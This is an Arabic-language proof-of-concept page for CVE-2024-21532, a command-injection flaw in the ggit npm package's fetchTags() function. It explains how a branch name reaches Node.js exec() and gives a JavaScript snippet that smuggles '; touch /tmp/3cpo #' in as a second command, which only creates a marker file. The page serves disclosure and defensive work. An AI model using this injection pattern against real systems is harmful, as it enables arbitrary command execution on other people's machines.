
CVE-2024-21532 PoC ggit
يصف ggit نفسه بأنه:
Local promise-returning git command wrappers
الموارد:
مقال عن هذه الثغرة: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability
أبلغ عن ثغرة حقن أوامر في حزمة ggit npm.
تظهر هذه الثغرة من خلال واجهة برمجة التطبيقات fetchTags(branch) الخاصة بالمكتبة، والتي تسمح بإدخال المستخدم لتحديد الفرع المراد جلبه، ثم تقوم بدمج هذه السلسلة مع أمر git، ثم يتم تمريرها إلى واجهة برمجة التطبيقات غير الآمنة exec() في Node.js لإدارة العمليات الفرعية.
[email protected] أو إصدار أقدمconst fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
// should be same as running command
// git pull origin --tags
console.log("done");
});
/tmp/3cpoيرجى الرجوع إلى المساهمة للحصول على إرشادات حول المساهمة في هذا المشروع.
Liran Tal